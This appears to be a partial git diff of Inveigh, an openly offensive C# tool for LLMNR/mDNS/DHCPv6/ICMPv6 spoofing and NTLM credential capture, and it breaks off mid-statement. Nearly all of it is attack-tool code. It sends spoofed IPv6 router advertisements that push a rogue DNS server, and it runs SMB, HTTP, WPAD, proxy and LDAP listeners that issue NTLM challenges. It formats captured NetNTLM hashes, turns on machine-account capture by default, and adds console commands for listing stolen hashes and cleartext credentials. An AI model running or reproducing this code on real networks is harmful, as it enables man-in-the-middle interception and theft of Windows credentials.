retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.ICMPv6; +using Quiddity.ICMPv6; using Quiddity.Support; using System; using System.Linq; @@ -52,7 +21,7 @@ namespace Inveigh ICMPv6RouterAdvertisement routerAdvertisement = new ICMPv6RouterAdvertisement { - RouterLifeTime = 1800 + RouterLifeTime = ushort.Parse(Program.argICMPv6TTL) }; if (Program.enabledDHCPv6) @@ -72,7 +41,7 @@ namespace Inveigh ICMPv6DNSSearchList dnsSearchList = new ICMPv6DNSSearchList { Length = (byte)length, - Lifetime = 1800, + Lifetime = uint.Parse(Program.argICMPv6TTL), DomainNames = dnsSearchListDataAdjusted }; @@ -86,7 +55,7 @@ namespace Inveigh ICMPv6RecursiveDNS recursiveDNS = new ICMPv6RecursiveDNS { Length = 3, - Lifetime = 1800, + Lifetime = uint.Parse(Program.argICMPv6TTL), RecursiveDNSServers = spooferIPv6Data }; @@ -97,12 +66,13 @@ namespace Inveigh { byte[] sendBuffer = routerAdvertisement.GetBytes(); Socket icmpv6SendSocket = new Socket(AddressFamily.InterNetworkV6, SocketType.Raw, ProtocolType.IcmpV6); + icmpv6SendSocket.SetSocketOption(SocketOptionLevel.IPv6, SocketOptionName.MulticastInterface, Program.networkInterfaceIndexIPv6); icmpv6SendSocket.SetSocketOption(SocketOptionLevel.IPv6, SocketOptionName.MulticastTimeToLive, 255); icmpv6SendSocket.SendBufferSize = sendBuffer.Length; IPEndPoint icmpv6EndPoint = new IPEndPoint(IPAddress.Parse("ff02::1"), 0); icmpv6SendSocket.SendTo(sendBuffer.ToArray(), sendBuffer.Length, SocketFlags.None, icmpv6EndPoint); icmpv6SendSocket.Close(); - Output.Queue(String.Format("[+] [{0}] ICMPv6 router advertisement{1}sent to [ff02::1]", Output.Timestamp(), responseMessage )); + Output.Queue(String.Format("[+] [{0}] ICMPv6 router advertisement{1}sent to [ff02::1]", Output.Timestamp(), responseMessage)); } catch (Exception ex) { diff --git a/Inveigh/Sockets/UDPSocket.cs b/Inveigh/Sockets/UDPSocket.cs index b8a9eb6..aaaf19d 100644 --- a/Inveigh/Sockets/UDPSocket.cs +++ b/Inveigh/Sockets/UDPSocket.cs @@ -1,35 +1,4 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using Quiddity.Support; +using Quiddity.Support; using Quiddity.UDP; using System; using System.Net; @@ -43,7 +12,9 @@ namespace Inveigh { IPAddress clientIPAddress = IPAddress.Parse(clientIP); AddressFamily addressFamily = AddressFamily.InterNetwork; + SocketOptionLevel socketOptionLevel = SocketOptionLevel.IP; IPAddress sourceIPAddress = IPAddress.Parse(sourceIP); + int networkInterfaceIndex = Program.networkInterfaceIndexIPv4; UDPHeader header = new UDPHeader { @@ -55,7 +26,9 @@ namespace Inveigh if (String.Equals(clientIPAddress.AddressFamily.ToString(), "InterNetworkV6")) { sourceIPAddress = IPAddress.Parse(sourceIP); + networkInterfaceIndex = Program.networkInterfaceIndexIPv6; addressFamily = AddressFamily.InterNetworkV6; + socketOptionLevel = SocketOptionLevel.IPv6; byte[] checksumBuffer = Utilities.BlockCopy(header.GetBytes(), buffer); header.IPv6Checksum(checksumBuffer, clientIP, sourceIPAddress.ToString(), 17); } @@ -67,6 +40,7 @@ namespace Inveigh SendBufferSize = 1024 }; + socket.SetSocketOption(socketOptionLevel, SocketOptionName.MulticastInterface, networkInterfaceIndex); IPEndPoint ipEndPoint = new IPEndPoint(sourceIPAddress, sourcePort); socket.Bind(ipEndPoint); IPEndPoint clientEndpoint = new IPEndPoint(clientIPAddress, clientPort); @@ -75,4 +49,5 @@ namespace Inveigh } } + } diff --git a/Inveigh/Support/Arguments.cs b/Inveigh/Support/Arguments.cs index c71f47e..83999c8 100644 --- a/Inveigh/Support/Arguments.cs +++ b/Inveigh/Support/Arguments.cs @@ -1,4 +1,5 @@ -using System; +using Quiddity.Support; +using System; using System.Collections.Generic; using System.IO; using System.Linq; @@ -31,7 +32,7 @@ namespace Inveigh nameof(Program.argLocal), nameof(Program.argLLMNR), nameof(Program.argLogOutput), - nameof(Program.argMachineAccounts), + nameof(Program.argMachineAccount), nameof(Program.argMDNS), nameof(Program.argMDNSUnicast), nameof(Program.argNBNS), @@ -58,7 +59,7 @@ namespace Inveigh Program.argLocal, Program.argLLMNR, Program.argLogOutput, - Program.argMachineAccounts, + Program.argMachineAccount, Program.argMDNS, Program.argMDNSUnicast, Program.argNBNS, @@ -76,6 +77,7 @@ namespace Inveigh nameof(Program.argDHCPv6TTL), nameof(Program.argDNSTTL), nameof(Program.argICMPv6Interval), + nameof(Program.argICMPv6TTL), nameof(Program.argLLMNRTTL), nameof(Program.argMDNSTTL), nameof(Program.argNBNSTTL), @@ -92,6 +94,7 @@ namespace Inveigh Program.argDHCPv6TTL, Program.argDNSTTL, Program.argICMPv6Interval, + Program.argICMPv6TTL, Program.argLLMNRTTL, Program.argMDNSTTL, Program.argNBNSTTL, @@ -101,7 +104,7 @@ namespace Inveigh }; ValidateStringArguments(ynArguments, ynArgumentValues, new string[] { "Y", "N" }); - ValidateStringArguments(new string[] { nameof(Program.argConsole) }, new string[] { Program.argConsole }, new string[] { "0", "1", "2", "3" }); + ValidateStringArguments(new string[] { nameof(Program.argConsole) }, new string[] { Program.argConsole }, new string[] { "0", "1", "2", "3", "4", "5" }); string[] authArguments = { nameof(Program.argHTTPAuth), nameof(Program.argProxyAuth), nameof(Program.argWPADAuth), nameof(Program.argWebDAVAuth) }; string[] authArgumentValues = { Program.argHTTPAuth, Program.argProxyAuth, Program.argWPADAuth, Program.argWebDAVAuth }; ValidateStringArguments(authArguments, authArgumentValues, new string[] { "ANONYMOUS", "BASIC", "NTLM" }); @@ -180,7 +183,7 @@ namespace Inveigh if (string.Equals(Program.argMDNS, "Y")) { Program.enabledMDNS = true; } if (string.Equals(Program.argMDNSUnicast, "Y")) { Program.enabledMDNSUnicast = true; } if (string.Equals(Program.argProxy, "Y")) { Program.enabledProxy = true; } - if (string.Equals(Program.argMachineAccounts, "Y")) { Program.enabledMachineAccounts = true; } + if (string.Equals(Program.argMachineAccount, "Y")) { Program.enabledMachineAccountCapture = true; } if (string.Equals(Program.argNBNS, "Y")) { Program.enabledNBNS = true; } if (string.Equals(Program.argSniffer, "Y")) { Program.enabledSniffer = true; } if (!Program.enabledWindows) { Program.enabledSniffer = false; } @@ -288,21 +291,87 @@ namespace Inveigh } - if (string.IsNullOrEmpty(Program.argMAC)) + if (!Program.enabledIPv4) { - if (string.IsNullOrEmpty(Program.argSnifferIPv6)) + Program.argDNSTypes = Program.argDNSTypes.Where(element => element != "A").ToArray(); + + if (Utilities.ArrayIsNullOrEmpty(Program.argDNSTypes)) { - Program.argMAC = GetLocalMACAddress(GetLocalIPAddress("IPv6")); + Program.argDNSTypes = new string[] { "AAAA" }; } - else + + Program.argLLMNRTypes = Program.argLLMNRTypes.Where(element => element != "A").ToArray(); + + if (Utilities.ArrayIsNullOrEmpty(Program.argLLMNRTypes)) { - Program.argMAC = GetLocalMACAddress(Program.argSnifferIPv6); + Program.argLLMNRTypes = new string[] { "AAAA" }; + } + + Program.argMDNSTypes = Program.argMDNSTypes.Where(element => element != "A").ToArray(); + + if (Utilities.ArrayIsNullOrEmpty(Program.argMDNSTypes)) + { + Program.argMDNSTypes = new string[] { "AAAA" }; } } - - Program.argMAC = Program.argMAC.Insert(2, ":").Insert(5, ":").Insert(8, ":").Insert(11, ":").Insert(14, ":"); + + if (!Program.enabledIPv6) + { + + Program.argDNSTypes = Program.argDNSTypes.Where(element => element != "AAAA").ToArray(); + + if (Utilities.ArrayIsNullOrEmpty(Program.argDNSTypes)) + { + Program.argDNSTypes = new string[] { "A" }; + } + + Program.argLLMNRTypes = Program.argLLMNRTypes.Where(element => element != "AAAA").ToArray(); + + if (Utilities.ArrayIsNullOrEmpty(Program.argLLMNRTypes)) + { + Program.argLLMNRTypes = new string[] { "A" }; + } + + Program.argMDNSTypes = Program.argMDNSTypes.Where(element => element != "AAAA").ToArray(); + + if (Utilities.ArrayIsNullOrEmpty(Program.argMDNSTypes)) + { + Program.argMDNSTypes = new string[] { "A" }; + } + + } + + if (Program.enabledIPv6) + { + + if (string.IsNullOrEmpty(Program.argMAC)) + { + + if (string.IsNullOrEmpty(Program.argSnifferIPv6)) + { + Program.argMAC = GetLocalMACAddress(GetLocalIPAddress("IPv6")); + } + else + { + Program.argMAC = GetLocalMACAddress(Program.argSnifferIPv6); + } + + } + + Program.argMAC = Program.argMAC.Insert(2, ":").Insert(5, ":").Insert(8, ":").Insert(11, ":").Insert(14, ":"); + } + + if (!string.IsNullOrEmpty(Program.argSnifferIP)) + { + Program.networkInterfaceIndexIPv4 = GetNetworkInterfaceIndex(Program.argSniffer); + } + + if (!string.IsNullOrEmpty(Program.argSnifferIPv6)) + { + Program.networkInterfaceIndexIPv6 = GetNetworkInterfaceIndex(Program.argSnifferIPv6); + } if (Program.enabledInspect) { @@ -514,5 +583,39 @@ namespace Inveigh return macAddressList.FirstOrDefault(); } + public static int GetNetworkInterfaceIndex(string ipAddress) + { + int index = 0; + + foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces()) + { + + if (networkInterface.NetworkInterfaceType == NetworkInterfaceType.Ethernet && networkInterface.OperationalStatus == OperationalStatus.Up) + { + + foreach (UnicastIPAddressInformation ip in networkInterface.GetIPProperties().UnicastAddresses) + { + + if (ip.Address.AddressFamily == AddressFamily.InterNetworkV6 && string.Equals(ip.Address.ToString(), ipAddress)) + { + index = networkInterface.GetIPProperties().GetIPv6Properties().Index; + break; + } + else if (ip.Address.AddressFamily == AddressFamily.InterNetwork && string.Equals(ip.Address.ToString(), ipAddress)) + { + index = networkInterface.GetIPProperties().GetIPv4Properties().Index; + break; + } + + } + + } + + } + + return index; + } + } + } diff --git a/Inveigh/Support/Control.cs b/Inveigh/Support/Control.cs index a0e7f44..9717f4f 100644 --- a/Inveigh/Support/Control.cs +++ b/Inveigh/Support/Control.cs @@ -124,6 +124,7 @@ namespace Inveigh Output.ProcessOutput(); Output.ProcessFileOutput(); Program.isRunning = false; + Quiddity.HTTPListener.isRunning = false; while (Program.consoleList.Count > 0) { @@ -313,9 +314,21 @@ namespace Inveigh if (Program.enabledSMB) { - SMBListener smbListener = new SMBListener(); - Thread smbListenerThread = new Thread(() => smbListener.Start(IPAddress.Parse(Program.argListenerIP), 445)); - smbListenerThread.Start(); + foreach (string port in Program.argSMBPorts) + { + + SMBListener smbListener = new SMBListener + { + Challenge = Program.argChallenge, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + + Thread smbListenerThread = new Thread(() => smbListener.Start(IPAddress.Parse(Program.argListenerIP), Int32.Parse(port))); + smbListenerThread.Start(); + } + } } @@ -353,9 +366,22 @@ namespace Inveigh if (Program.enabledSMB) { - SMBListener smbv6Listener = new SMBListener(); - Thread smbv6ListenerThread = new Thread(() => smbv6Listener.Start(IPAddress.Parse(Program.argListenerIPv6), 445)); - smbv6ListenerThread.Start(); + + foreach (string port in Program.argSMBPorts) + { + + SMBListener smbv6Listener = new SMBListener + { + Challenge = Program.argChallenge, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + + Thread smbv6ListenerThread = new Thread(() => smbv6Listener.Start(IPAddress.Parse(Program.argListenerIPv6), Int32.Parse(port))); + smbv6ListenerThread.Start(); + } + } } @@ -373,7 +399,23 @@ namespace Inveigh foreach (string port in Program.argHTTPPorts) { - HTTPListener httpListener = new HTTPListener(); + + HTTPListener httpListener = new HTTPListener + { + Challenge = Program.argChallenge, + EnabledWebDAV = true, + IgnoreAgents = Program.argIgnoreAgents, + HTTPAuth = Program.argHTTPAuth, + WebDAVAuth = Program.argWebDAVAuth, + WPADAuth = Program.argWPADAuth, + HTTPRealm = Program.argHTTPRealm, + HTTPResponse = Program.argHTTPResponse, + WPADResponse = Program.argWPADResponse, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + Thread httpListenerThread = new Thread(() => httpListener.Start(IPAddress.Parse(Program.argListenerIP), Int32.Parse(port), "HTTP")); httpListenerThread.Start(); } @@ -385,7 +427,25 @@ namespace Inveigh foreach (string port in Program.argHTTPSPorts) { - HTTPListener httpsListener = new HTTPListener(); + + HTTPListener httpsListener = new HTTPListener + { + Challenge = Program.argChallenge, + Cert = Program.argCert, + CertPassword = Program.argCertPassword, + EnabledWebDAV = true, + IgnoreAgents = Program.argIgnoreAgents, + HTTPAuth = Program.argHTTPAuth, + WebDAVAuth = Program.argWebDAVAuth, + WPADAuth = Program.argWPADAuth, + HTTPRealm = Program.argHTTPRealm, + HTTPResponse = Program.argHTTPResponse, + WPADResponse = Program.argWPADResponse, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + Thread httpsListenerThread = new Thread(() => httpsListener.Start(IPAddress.Parse(Program.argListenerIP), Int32.Parse(port), "HTTPS")); httpsListenerThread.Start(); } @@ -397,7 +457,15 @@ namespace Inveigh foreach (string port in Program.argLDAPPorts) { - LDAPListener ldapListener = new LDAPListener(); + + LDAPListener ldapListener = new LDAPListener + { + Challenge = Program.argChallenge, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + Thread ldapListenerThread = new Thread(() => ldapListener.Start(IPAddress.Parse(Program.argListenerIP), Int32.Parse(port))); ldapListenerThread.Start(); } @@ -406,7 +474,23 @@ namespace Inveigh if (Program.enabledProxy) { - HTTPListener proxyListener = new HTTPListener(); + + HTTPListener proxyListener = new HTTPListener + { + Challenge = Program.argChallenge, + EnabledWebDAV = false, + IgnoreAgents = Program.argIgnoreAgents, + HTTPAuth = Program.argHTTPAuth, + WebDAVAuth = Program.argWebDAVAuth, + WPADAuth = Program.argWPADAuth, + HTTPRealm = Program.argHTTPRealm, + HTTPResponse = Program.argHTTPResponse, + WPADResponse = Program.argWPADResponse, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + Thread proxyListenerThread = new Thread(() => proxyListener.Start(IPAddress.Parse(Program.argListenerIP), Int32.Parse(Program.argProxyPort), "Proxy")); proxyListenerThread.Start(); } @@ -422,7 +506,15 @@ namespace Inveigh foreach (string port in Program.argLDAPPorts) { - LDAPListener ldapv6Listener = new LDAPListener(); + + LDAPListener ldapv6Listener = new LDAPListener + { + Challenge = Program.argChallenge, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + Thread ldapv6ListenerThread = new Thread(() => ldapv6Listener.Start(IPAddress.Parse(Program.argListenerIPv6), Int32.Parse(port))); ldapv6ListenerThread.Start(); } @@ -434,7 +526,23 @@ namespace Inveigh foreach (string port in Program.argHTTPPorts) { - HTTPListener httpv6Listener = new HTTPListener(); + + HTTPListener httpv6Listener = new HTTPListener + { + Challenge = Program.argChallenge, + EnabledWebDAV = true, + IgnoreAgents = Program.argIgnoreAgents, + HTTPAuth = Program.argHTTPAuth, + WebDAVAuth = Program.argWebDAVAuth, + WPADAuth = Program.argWPADAuth, + HTTPRealm = Program.argHTTPRealm, + HTTPResponse = Program.argHTTPResponse, + WPADResponse = Program.argWPADResponse, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + Thread httpv6ListenerThread = new Thread(() => httpv6Listener.Start(IPAddress.Parse(Program.argListenerIPv6), Int32.Parse(port), "HTTPv6")); httpv6ListenerThread.Start(); } @@ -446,7 +554,25 @@ namespace Inveigh foreach (string port in Program.argHTTPPorts) { - HTTPListener httpsv6Listener = new HTTPListener(); + + HTTPListener httpsv6Listener = new HTTPListener + { + Challenge = Program.argChallenge, + Cert = Program.argCert, + CertPassword = Program.argCertPassword, + EnabledWebDAV = true, + IgnoreAgents = Program.argIgnoreAgents, + HTTPAuth = Program.argHTTPAuth, + WebDAVAuth = Program.argWebDAVAuth, + WPADAuth = Program.argWPADAuth, + HTTPRealm = Program.argHTTPRealm, + HTTPResponse = Program.argHTTPResponse, + WPADResponse = Program.argWPADResponse, + NetbiosDomain = Program.netbiosDomain, + ComputerName = Program.computerName, + DNSDomain = Program.dnsDomain + }; + Thread httpsv6ListenerThread = new Thread(() => httpsv6Listener.Start(IPAddress.Parse(Program.argListenerIPv6), Int32.Parse(port), "HTTPSv6")); httpsv6ListenerThread.Start(); } diff --git a/Inveigh/Support/Output.cs b/Inveigh/Support/Output.cs index 936a5c7..926682c 100644 --- a/Inveigh/Support/Output.cs +++ b/Inveigh/Support/Output.cs @@ -130,6 +130,11 @@ namespace Inveigh Console.WriteLine(); } + public static void OutputCommand(string message) + { + Console.WriteLine(message); + } + public static void OutputCommand(string description, string[] headings, IList list, ConsoleColor color) { Console.ForegroundColor = color; @@ -215,7 +220,12 @@ namespace Inveigh consoleEntry = ""; } - string entryType = consoleEntry.Substring(1, 1); + string entryType = ""; + + if (consoleEntry.Length > 1) + { + entryType = consoleEntry.Substring(1, 1); + } if (entryType.Equals(".")) { @@ -229,6 +239,10 @@ namespace Inveigh { OutputColor(consoleEntry, "+", Program.colorPositive); } + else if (entryType.Equals(" ")) + { + OutputColor(consoleEntry, " ", Program.colorDisabled); + } else if (entryType.Equals("!")) { Console.ForegroundColor = ConsoleColor.Yellow; @@ -272,7 +286,7 @@ namespace Inveigh } else { - Queue("[-] Packet Sniffer"); + Queue("[ ] Packet Sniffer"); } GetStartupMessageIP(string.Concat("Listener ", address), Program.argListenerIP, Program.argListenerIPv6); @@ -323,7 +337,7 @@ namespace Inveigh } else { - Queue("[-] ICMPv6"); + Queue("[ ] ICMPv6"); } GetStartupMessageUDP("LLMNR", Program.enabledLLMNR, Program.argLLMNRTypes, null, null, null); @@ -336,7 +350,7 @@ namespace Inveigh GetStartupMessageTCP("LDAP", Program.enabledLDAP, null, null, Program.argLDAPPorts); GetStartupMessageTCP("SMB", Program.enabledSMB, null, null, Program.argSMBPorts); if (Program.enabledFileOutput) Queue(string.Format("[+] File Output [{0}]", Program.argFileDirectory)); - else Queue("[-] File Output"); + else Queue("[ ] File Output"); if (Program.isSession) Queue("[+] Previous Session Files [Imported]"); else Queue("[+] Previous Session Files (Not Found)"); if (Program.runCount == 1) Program.outputList.Add(string.Format("[+] Run Count [{0} Minute]", Program.runCount)); @@ -349,7 +363,7 @@ namespace Inveigh public static void GetStartupMessageIP(string ipType, string address1, string address2) { string startupMessage = ""; - string optionStatus = "-"; + string optionStatus = " "; if (Program.enabledIPv4 && !string.IsNullOrEmpty(address1) && Program.enabledIPv6 && !string.IsNullOrEmpty(address2)) { @@ -378,7 +392,7 @@ namespace Inveigh { string startupMessage; string optionType = "Listener"; - string optionStatus = "-"; + string optionStatus = " "; string types; string typesHeader = "Type"; string questions; @@ -445,7 +459,7 @@ namespace Inveigh { string startupMessage = ""; string optionType = "Listener"; - string optionStatus = "-"; + string optionStatus = " "; string portHeading = "Port"; if (Program.enabledSniffer && protocol.StartsWith("SMB")) @@ -519,7 +533,7 @@ namespace Inveigh challengeResponse = user + "::" + domain + ":" + lmResponse + ":" + ntlmResponse + ":" + challenge; } - if (Program.enabledMachineAccounts || (!Program.enabledMachineAccounts && !user.EndsWith("$"))) + if (Program.enabledMachineAccountCapture || (!Program.enabledMachineAccountCapture && !user.EndsWith("$"))) { if (!string.IsNullOrEmpty(challenge)) @@ -686,25 +700,33 @@ namespace Inveigh } - public static void SpooferOutput(string protocol, string type, string request, string clientIP, string outputMessage) + public static void SpooferOutput(string protocol, string type, string request, string clientIP, string message) { string status = "-"; - if (outputMessage.Equals("response sent")) + if (message.Equals("response sent")) { status = "+"; } + else if (message.Equals("disabled")) + { + status = " "; + } - Queue(string.Format("[{0}] [{1}] {2}({3}) request [{4}] from {5} [{6}]", status, Timestamp(), protocol, type, request, clientIP, outputMessage)); + Queue(string.Format("[{0}] [{1}] {2}({3}) request [{4}] from {5} [{6}]", status, Timestamp(), protocol, type, request, clientIP, message)); } public static void DHCPv6Output(int msgType, string leaseIP, string clientIP, string clientMAC, string clientHostname, string message) { - string responseStatus = "-"; + string status = "-"; - if (string.Equals(message, "response sent")) + if (message.Equals("response sent")) { - responseStatus = "+"; + status = "+"; + } + else if (message.Equals("disabled")) + { + status = " "; } string responseType = ""; @@ -739,20 +761,20 @@ namespace Inveigh if (!string.IsNullOrEmpty(clientHostname)) { - Output.Queue(string.Format("[{0}] [{1}] DHCPv6 [{2}] from {3}({4}) [{5}]", responseStatus, Output.Timestamp(), responseType, clientIP, clientHostname, message)); + Output.Queue(string.Format("[{0}] [{1}] DHCPv6 [{2}] from {3}({4}) [{5}]", status, Output.Timestamp(), responseType, clientIP, clientHostname, message)); } else { - Output.Queue(string.Format("[{0}] [{1}] DHCPv6 [{2}] from {3} [{4}]", responseStatus, Output.Timestamp(), responseType, clientIP, message)); + Output.Queue(string.Format("[{0}] [{1}] DHCPv6 [{2}] from {3} [{4}]", status, Output.Timestamp(), responseType, clientIP, message)); } if (string.Equals(message, "response sent")) { - Output.Queue(string.Format("[{0}] [{1}] DHCPv6 [{2}] {3} to [{4}]", responseStatus, Output.Timestamp(), leaseIP, responseAction, clientMAC)); + Output.Queue(string.Format("[{0}] [{1}] DHCPv6 [{2}] {3} to [{4}]", status, Output.Timestamp(), leaseIP, responseAction, clientMAC)); } else { - Output.Queue(string.Format("[{0}] [{1}] DHCPv6 client MAC [{2}]", responseStatus, Output.Timestamp(), clientMAC)); + Output.Queue(string.Format("[{0}] [{1}] DHCPv6 client MAC [{2}]", status, Output.Timestamp(), clientMAC)); } } @@ -827,7 +849,7 @@ namespace Inveigh if (nullarg || string.Equals(arg, "CONSOLE")) { string argument = "Console"; - string description = "Default=3: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no informational, 3=all)"; + string description = "Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all)"; OutputHelp(argument, description); } @@ -964,6 +986,13 @@ namespace Inveigh OutputHelp(argument, description); } + if (nullarg || string.Equals(arg, "ICMPV6TTL")) + { + string argument = "ICMPv6TTL"; + string description = "Default=300: ICMPv6 TTL in seconds."; + OutputHelp(argument, description); + } + if (nullarg || string.Equals(arg, "IGNOREDOMAINS")) { string argument = "IgnoreDomains"; @@ -1237,10 +1266,10 @@ namespace Inveigh OutputHelp(argument, description); } - if (nullarg || string.Equals(arg, "MACHINES")) + if (nullarg || string.Equals(arg, "MACHINEACCOUNT")) { - string argument = "Machines"; - string description = "Default=Disabled: (Y/N) machine account NetNTLM captures."; + string argument = "MachineAccount"; + string description = "Default=Enabled: (Y/N) machine account NetNTLM captures."; OutputHelp(argument, description); } @@ -1329,7 +1358,17 @@ namespace Inveigh while (Program.outputList.Count > 0) { - if (Program.console == 3) + if (Program.console == 5) + { + Program.consoleList.Add(Program.outputList[0]); + } + + if (Program.console == 4 && (Program.outputList[0].StartsWith("[*]") || Program.outputList[0].StartsWith("[+]") || Program.outputList[0].StartsWith("[-]") || Program.outputList[0].StartsWith("[.]") || !Program.outputList[0].StartsWith("["))) + { + Program.consoleList.Add(Program.outputList[0]); + } + + if (Program.console == 3 && (Program.outputList[0].StartsWith("[*]") || Program.outputList[0].StartsWith("[+]") || Program.outputList[0].StartsWith("[.]") || !Program.outputList[0].StartsWith("["))) { Program.consoleList.Add(Program.outputList[0]); } diff --git a/Inveigh/Support/Shell.cs b/Inveigh/Support/Shell.cs index d42a2cc..bfe5037 100644 --- a/Inveigh/Support/Shell.cs +++ b/Inveigh/Support/Shell.cs @@ -34,6 +34,15 @@ namespace Inveigh "get ntlmv2usernames", "get cleartext", "get cleartextunique", + "get replytohosts", + "get replytoips", + "get replytodomains", + "get replytomacs", + "get ignorehosts", + "get ignoreips", + "get ignoredomains", + "get ignoremacs", + "set console", "history", "resume", "stop" @@ -53,7 +62,7 @@ namespace Inveigh if (input.Key == ConsoleKey.Enter) { - if (builder.Length > 0 && builder.ToString().Replace(" ", "").Length > 0 && commandList.Any(item => item.StartsWith(builder.ToString(), true, CultureInfo.InvariantCulture))) + if (builder.Length > 0 && builder.ToString().Replace(" ", "").Length > 0 && commandList.Any(builder.ToString().Contains)) { Program.commandHistoryList.Add(builder.ToString()); } @@ -139,7 +148,7 @@ namespace Inveigh if (input.Key == ConsoleKey.Enter) { - if (builder.Length > 0 && builder.ToString().Replace(" ", "").Length > 0 && commandList.Any(item => item.StartsWith(builder.ToString(), true, CultureInfo.InvariantCulture))) + if (builder.Length > 0 && builder.ToString().Replace(" ", "").Length > 0 && commandList.Any(builder.ToString().Contains)) { Program.commandHistoryList.Remove(builder.ToString()); Program.commandHistoryList.Add(builder.ToString()); @@ -364,12 +373,12 @@ namespace Inveigh public static void Commands(string inputCommand) { string[] inputArray = inputCommand.Split(' '); - string search = ""; + string value = ""; if (!Utilities.ArrayIsNullOrEmpty(inputArray) && inputArray.Length == 3) { inputCommand = string.Concat(inputArray[0], " ", inputArray[1]); - search = inputArray[2]; + value = inputArray[2]; } inputCommand = inputCommand.ToUpper(); @@ -388,70 +397,89 @@ namespace Inveigh break; case "GET LOG": - - foreach (string entry in Program.logList) - { - Output.ConsoleOutputFormat(entry); - } - + GetLog(value); break; case "GET CLEARTEXT": - GetCleartext(search); + GetCleartext(value); break; case "GET CLEARTEXTUNIQUE": - GetCleartextUnique(search); + GetCleartextUnique(value); break; case "GET DHCPV6LEASES": - GetDHCPv6Leases(search); + GetDHCPv6Leases(value); break; case "GET NTLMV1": - GetNTLMv1(search); + GetNTLMv1(value); break; case "GET NTLMV1UNIQUE": - GetNTLMv1Unique(search); + GetNTLMv1Unique(value); break; case "GET NTLMV1USERNAMES": - GetNTLMv1Usernames(search); + GetNTLMv1Usernames(value); break; case "GET NTLMV2": - GetNTLMv2(search); + GetNTLMv2(value); break; case "GET NTLMV2UNIQUE": - GetNTLMv2Unique(search); + GetNTLMv2Unique(value); break; case "GET NTLMV2USERNAMES": - GetNTLMv2Usernames(search); + GetNTLMv2Usernames(value); break; - case "GET SPOOFERReplyToHosts": + case "GET REPLYTOHOSTS": foreach (string entry in Program.argReplyToHosts) Console.WriteLine(entry); break; - case "GET SPOOFERHOSTSDENY": + case "GET IGNOREHOSTS": foreach (string entry in Program.argIgnoreHosts) Console.WriteLine(entry); break; - case "GET SPOOFERReplyToIPs": - foreach (string entry in Program.argReplyToHosts) + case "GET REPLYTOIPS": + foreach (string entry in Program.argReplyToIPs) Console.WriteLine(entry); break; - case "GET SPOOFERIPSDENY": + case "GET IGNOREIPS": foreach (string entry in Program.argIgnoreHosts) Console.WriteLine(entry); break; + case "GET REPLYTODOMAINS": + foreach (string entry in Program.argReplyToDomains) + Console.WriteLine(entry); + break; + + case 